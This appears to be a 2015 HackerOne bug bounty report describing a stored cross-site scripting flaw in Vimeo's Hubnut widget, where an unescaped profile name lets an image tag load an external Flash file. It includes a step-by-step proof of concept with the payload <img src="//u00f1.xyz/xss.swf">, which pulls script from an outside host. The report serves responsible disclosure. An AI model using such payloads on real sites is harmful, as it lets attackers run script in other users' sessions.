Vimeo: Stored XSS on vimeo.com and player.vimeo.com

2015-09-05T06:28:15
ID H1:87577
Type hackerone
Reporter stefanofinding
Modified 2015-11-30T14:17:08

Description

Description

You can share your uploaded videos using the widget Hubnut. The URL is something like https://player.vimeo.com/hubnut/user/user36690798/uploaded_videos?color=44bbff&background=000000&slideshow=0&video_title=1&video_byline=1, and I noticed that the same content is loaded for this URL https://vimeo.com/hubnut/user/user36690798/uploaded_videos?color=44bbff&background=000000&slideshow=0&video_title=1&video_byline=1. The problem is that the Flash file that shows the files uploaded by an user (https://f.vimeocdn.com/p/flash/hubnut/2.0.11/hubnut.swf) renders the Name of the owner of the video without escaping it. This allows to load an external Flash file using the <img> tag.

Proof of concept

  1. Go to https://vimeo.com/settings.
  2. Change your Name to <img src="//u00f1.xyz/xss.swf">.
  3. Click on Save Changes.
  4. Go to https://vimeo.com/settings/profile.
  5. Save, for future use, the editable value of the field Vimeo URL (probably is like user36690798).
  6. Go to https://player.vimeo.com/hubnut/user/[value_from_step_5] (like: https://player.vimeo.com/hubnut/user/user36690798).
  7. alert(document.domain) is executed.
  8. Go to https://vimeo.com/hubnut/user/[value_from_step_5] (like: https://vimeo.com/hubnut/user/user36690798).
  9. alert(document.domain) is executed.

Please, let me know if something is not clear.